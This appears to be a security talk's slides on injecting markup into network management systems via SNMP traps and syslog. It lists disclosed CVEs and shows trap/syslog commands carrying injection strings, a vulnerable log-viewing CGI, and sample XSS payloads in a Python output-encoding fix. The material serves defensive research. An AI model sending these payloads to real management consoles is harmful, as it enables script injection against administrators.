R7-2016-11.3        CVE-2016-5074    Format String   Cloudview   Version 2.10a
R7-2016-11.4        CVE-2016-5075    XSS             Cloudview   Version 2.10a
R7-2016-11.5        CVE-2016-5076    DOA             Cloudview   Version 2.10a
R7-2016-12          CVE-2016-5077    XSS             Netikus     Version 3.2.1.44
R7-2016-13          CVE-2016-5078    XSS             Paessler    Version 16.2.24.4045
R7-2016-14.1        CVE-2016-5642    XSS             Opmantek    Versions 8.5.12G
R7-2016-14.2        CVE-2016-5642    XSS             Opmantek    Versions 8.5.12G, 4.3.7c
R7-2016-14.3        CVE-2016-5642    XSS             Opmantek    Versions 8.5.12G, 4.3.7c
R7-2016-14.4        CVE-2016-6534    Cmd Injection   Opmantek    Versions 8.5.12G, 4.3.7c
(https://community.rapid7.com/community/infosec/blog/2016/09/07/multiple-disclosures-for-multiple-network-management-systems-part-2)

Deral Heiland, Matthew Kienow – Managed to Mangled: Exploitation of Enterprise Network Management Systems
(https://www.derbycon.com/events/managed-to-mangled-exploitation-of-enterprise-network-management-systems/)

SNMP Data Harvesting During Penetration Testing – May 4, 2016
(https://community.rapid7.com/community/services/blog/2016/05/05/snmp-data-harvesting-during-penetration-testing)

Simple Network Management Protocol (SNMP) Best Practices – Jan 27, 2016
(https://community.rapid7.com/community/services/blog/2016/01/27/simple-network-management-protocol-snmp-best-practices)

Example string

# ./snmpRequest -p TRAP -v 2c 192.168.200.133/162 \
    "1.3.6.1.2.1.1.3.0={t}0" \
    "1.3.6.1.6.3.1.1.4.1.0={o}1.3.6.1.4.1.9.0.1" \
    "1.3.6.1.6.3.1.1.4.1.0={s}\<src=http://181.224.145.117/wp-content/uploads/2015/11/tavve_logo.gif.gif/\>"

snmpRequest is a wrapper for snmp4j.jar

# ./java -jar /root/syslog4j-0.9.46-bin.jar -h 192.168.200.133 udp \
    "\<src=http://181.224.145.117/wp-content/uploads/2015/11/tavve_logo.gif.gif/\>"

Good Apps

snmpTrapOID.0=&lt;src=<span class='eventHref'> http://181.224.145.117/wp-content/uploads/2015/11/tavve_logo.gif.gif/&gt;'</span>

“<” rendered as “&lt;”, “>” rendered as “&gt;”

Bad App

/var/www/html/cgi-bin# cat showlog
#!/bin/sh
echo "<HTML>"
echo "Last 100 lines of /var/log/syslog:<br><pre>"
date
date | sed -e "s/./-/g"
/usr/bin/tail -n 100 /var/log/syslog 2>&1
echo "</BODY></HTML>"

http://xxx.xxx.xxx.xxx/cgi-bin/showlog

Last 100 lines of /var/log/syslog:
Sun Sep 25 02:59:06 UTC 2016
----------------------------
Sep 25 01:49:12 kali lighttpd[7303]: Syntax OK
Sep 25 01:49:12 kali systemd[1]: Started Lighttpd Daemon.
Sep 25 01:49:12 kali lighttpd[7311]: 2016-09-25 01:49:12: (plugin.c.183) Cannot load plugin mod_accesslog more than once, please fix your config (lighttpd may not accept such configs in future releases)
Sep 25 01:49:12 kali lighttpd[7311]: 2016-09-25 01:49:12: (plugin.c.183) Cannot load plugin mod_cgi more than once, please fix your config (lighttpd may not accept such configs in future releases)
Sep 25 01:49:12 kali lighttpd[7311]: 2016-09-25 01:49:12: (plugin.c.183) Cannot load plugin mod_status more than once, please fix your config (lighttpd may not accept such configs in future releases)
Sep 25 01:49:44 kali systemd[1]: Stopping Lighttpd Daemon...
Sep 25 01:49:44 kali systemd[1]: Stopped Lighttpd Daemon.
<snip>

Bad App Results

<snip>
Sep 25 02:34:03 kali lighttpd[8372]: /usr/bin/tail: cannot open '/var/log/messages' for reading: Permission denied
Sep 25 02:34:34 kali lighttpd[8372]: /usr/bin/tail: cannot open '/var/log/messages' for reading: Permission denied
Sep 25 02:34:58 kali lighttpd[8372]: cat: /var/log/messages: Permission denied
Sep 25 02:35:01 kali CRON[8455]: (root) CMD (command -v debian-sa1 > /dev/null && debian-sa1 1 1)
Sep 25 02:38:30 kali lighttpd[8372]: /usr/bin/tail: cannot open '/var/log/messages' for reading: Permission denied
Sep 25 02:39:12 kali lighttpd[8372]: /usr/bin/tail: cannot open '/var/log/messages' for reading: Permission denied
Sep 25 02:40:34 kali lighttpd[8372]: /usr/bin/tail: cannot open '/var/log/messages' for reading: Permission denied
Sep 25 02:45:01 kali CRON[8550]: (root) CMD (command -v debian-sa1 > /dev/null && debian-sa1 1 1)
Sep 25 02:47:27 kali root: chuckc
Sep 25 02:48:57 kali root: \
Sep 25 02:50:22 kali root: \
Sep 25 02:51:06 kali root: \
Sep 25 02:55:01 kali CRON[8627]: (root) CMD (command -v debian-sa1 > /dev/null && debian-sa1 1 1)
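The “Good Apps” rendering as an added Python example (not the talk's code and not any vendor's): the same showlog page the Bad App CGI produces, except that every received line is HTML-encoded before it lands inside the <pre>, and control characters (terminal escapes, or a CR/LF that would forge a second log line) are made visible. The sample syslog lines and the trap varbind value are constructed from the injection strings on the slides; the function names are this example's own.

```python
import html
import re

# Constructed samples: the injection strings from the slides as they would arrive in a trap
# varbind and in syslog lines (the last line also carries a terminal escape and a CR/LF).
SAMPLE_TRAP_VARBIND = "<src=http://181.224.145.117/wp-content/uploads/2015/11/tavve_logo.gif.gif/>"
SAMPLE_SYSLOG_LINES = [
    "Sep 25 02:47:27 kali root: chuckc",
    "Sep 25 02:48:57 kali root: <script>alert(\"TEST\");</script>",
    "Sep 25 02:50:22 kali root: <body onload=alert('test1')>",
    "Sep 25 02:51:06 kali root: <IMG SRC=j&#X41vascript:alert('test2')>",
    "Sep 25 02:52:00 kali root: \x1b[2Jcleared\r\nSep 25 02:52:00 kali root: forged line",
]

CONTROL_CHARS = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")

def clean_log_text(raw):
    """Make a received string safe to display: CR/LF and other control characters become
    visible escapes (so one message cannot forge a second line or drive the terminal), then
    < > & " ' are HTML-encoded, which is what the Good Apps slide shows as &lt; and &gt;."""
    raw = raw.replace("\r", "\\r").replace("\n", "\\n")
    raw = CONTROL_CHARS.sub(lambda m: "\\x%02x" % ord(m.group()), raw)
    return html.escape(raw, quote=True)

def render_showlog(lines, n=100):
    """Safe counterpart of the Bad App CGI: last n lines inside <pre>, every line encoded."""
    body = "\n".join(clean_log_text(line) for line in lines[-n:])
    return "<html><body>Last %d lines of /var/log/syslog:<br><pre>%s</pre></body></html>" % (n, body)

def render_trap_varbind(name, value):
    """One trap varbind for an event page, e.g. snmpTrapOID.0=&lt;src=...&gt;"""
    return "%s=%s" % (html.escape(name), clean_log_text(value))

def contains_live_markup(rendered):
    """True if any '<' other than the page's own html/body/br/pre tags survived encoding."""
    return re.search(r"<(?!/?(html|body|br|pre)\b)", rendered) is not None
```

Encoding & before < and > also turns the entity-encoded j&#X41vascript example into inert text, because the browser never sees a live ampersand. The escaping happens at output time on purpose: the trap or syslog sender, not the person viewing the page, chose the content, so nothing that arrives over UDP 162 or 514 can be trusted to be display-safe.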

Filter/fix Incoming traps/syslogs

[Diagram: managed node 20.20.20.20 sends UDP traps/syslog to management servers 10.10.10.10, 10.10.10.11, 10.10.10.12 through three deployments]
• Normal IP Routing – No data cleanup
• FW NATs internal (20.20.20.10) – No data cleanup
• UDP Proxy (20.20.20.15) – UDP = SNMP Traps, Syslog, Netflow. Packet recreated. Options to maintain or replace data field. Filter packets.

Internal Address Hiding

[Diagram: the managed node 20.20.20.20 is configured to reach the management server 10.10.10.10 through the three deployments]
• Normal IP Routing – Trap/Syslog Dest: 10.10.10.10
• FW NATs internal (20.20.20.10) – Trap/Syslog Dest: 20.20.20.10
• UDP Proxy (20.20.20.15) – Trap/Syslog Dest: 20.20.20.15

Reduce Destination List

[Diagram: managed node 20.20.20.20 sending traps to the management servers 10.10.10.10 Prod1, 10.10.10.11 Prod2, 10.10.10.12 Test]
• Normal IP Routing – Trap Destinations: 10.10.10.10, 10.10.10.11, 10.10.10.12
• FW Static NAT inside (20.20.20.10, 20.20.20.11, 20.20.20.12) – Trap Destinations: 20.20.20.10, 20.20.20.11, 20.20.20.12
• UDP Proxy (20.20.20.15) – Trap Destination: 20.20.20.15 (proxy does fanout)
